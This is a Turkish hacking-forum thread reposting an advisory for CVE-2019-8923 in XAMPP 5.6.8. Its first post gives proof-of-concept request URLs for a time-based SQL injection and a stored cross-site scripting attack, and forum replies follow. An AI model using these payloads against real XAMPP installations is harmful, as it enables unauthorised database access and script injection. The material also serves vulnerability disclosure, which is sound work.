Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Exploitler

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...


XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting

Exploitler

Yeni Konu aç Cevapla
 
Seçenekler
Alt 20-02-2019 22:04   #1
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
127.0.0.1
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 110


XAMPP 5.6.8 - SQL Injection / Persistent Cross-Site Scripting



# Exploit Title/Exploit Başlığı: SQL injection in XAMPP 5.6.8 (ve öncesi)
# CVE: CVE-2019-8923
# Date/Tarih: 17-02-2019
# Exploit Author/Exploit Yazarı: Rafael Pedrero
# Vendor Homepage/Yapımcı Sitesi: https://sourceforge.net/projects/xam...Windows/5.6.8/
# Software Link/Yazılımın Linki: https://sourceforge.net/projects/xam...Windows/5.6.8/
# Version/Versiyon: XAMPP 5.6.8
# Category/Kategori: Webapps
# Tested on/Test Edilen Sistem: All (hepsi)

1.Proof of Concept/İspat:
http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20 AND%20sleep%285%29

2. Solution/Çözüm: Yok. En son sürüme güncelleyin.
References/Referanslar :
https://sourceforge.net/projects/xam...Windows/1.8.2/
https://sourceforge.net/projects/xam...indows/5.5.19/
https://sourceforge.net/projects/xam...Windows/5.6.8/


----------------------------------------------------------------------------------------------------------

# Exploit Title/Exploit Başlığı: SQL injection in XAMPP 5.6.8 (ve öncesi)
# CVE: CVE-2019-8923
# Date/Tarih: 17-02-2019
# Exploit Author/Exploit Yazarı: Rafael Pedrero
# Vendor Homepage/Yapımcı Sitesi: https://sourceforge.net/projects/xam...Windows/5.6.8/
# Software Link/Yazılımın Linki: https://sourceforge.net/projects/xam...Windows/5.6.8/
# Version/Versiyon: XAMPP 5.6.8
# Category/Kategori: Webapps
# Tested on/Test Edilen Sistem: All (hepsi)

1.Proof of Concept / İspat:
İlk istek http://X.X.X.X/xampp/cds.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984 veya http://localhost/xampp/cds.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984
İkinci istek (XSS saldırısı için) http://X.X.X.X/xampp/cds-fpdf.php

http://localhost/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984

http://localhost/xampp/cds-fpdf.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984


cds-fpdf.php yüklenirken karakterleri filtrelemeyin: <b><script>alert("XSS")</script></b></td><td class=tabval>

cds.php filtrele: <td class=tabval><b><script>alert("XSS&quot</script></b></td><td class=tabval>


2. Solution/Çözüm:
Yok.Son sürüme güncelleyin.



Exploit Linki :
https://www.exploit-db.com/exploits/46424



___________________________________________

NE MUTLU TÜRK'ÜM DİYENE


Konu BAGAY tarafından (20-02-2019 23:02 Saat 23:02 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

DWTCN, Zenotron Teşekkür etti.
Alt 20-02-2019 22:09   #2
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
12/2018
Nereden
İstihbarat
Mesajlar
Konular

Teşekkür (Etti): 107
Teşekkür (Aldı): 54




Exploit Linki tıklanmıyor komutanım .
Sağolun
İyi, günler



___________________________________________

ƊƜƬƇƝ

 Offline  
 
Alıntı ile Cevapla
Alt 20-02-2019 22:47   #3
  • Teğmen
  • Üye Bilgileri
Üyelik tarihi
01/2019
Mesajlar
Konular

Teşekkür (Etti): 1
Teşekkür (Aldı): 44




Linkler sağlam sorun yok konuya vaktim olunca bakıcam exploit kullanımı hakkında hiç bilgim yok neredeyse ama işime yarıcanı düşünüyorum not ettim boş zamanımda bakıcam komular arasına ekledim sağol



___________________________________________

Sakın Tıklama Bak Uyarıyorum.

 Offline  
 
Alıntı ile Cevapla
Alt 20-02-2019 23:02   #4
  • Anka Saldırı Timi Asistanı
  • Üye Bilgileri
Üyelik tarihi
07/2014
Nereden
127.0.0.1
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 54
Teşekkür (Aldı): 110




Alıntı:
DWTCN´isimli üyeden Alıntı Mesajı göster
Exploit Linki tıklanmıyor komutanım .
Sağolun
İyi, günler
Düzeltildi,hayırlı geceler ..



___________________________________________

NE MUTLU TÜRK'ÜM DİYENE

 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau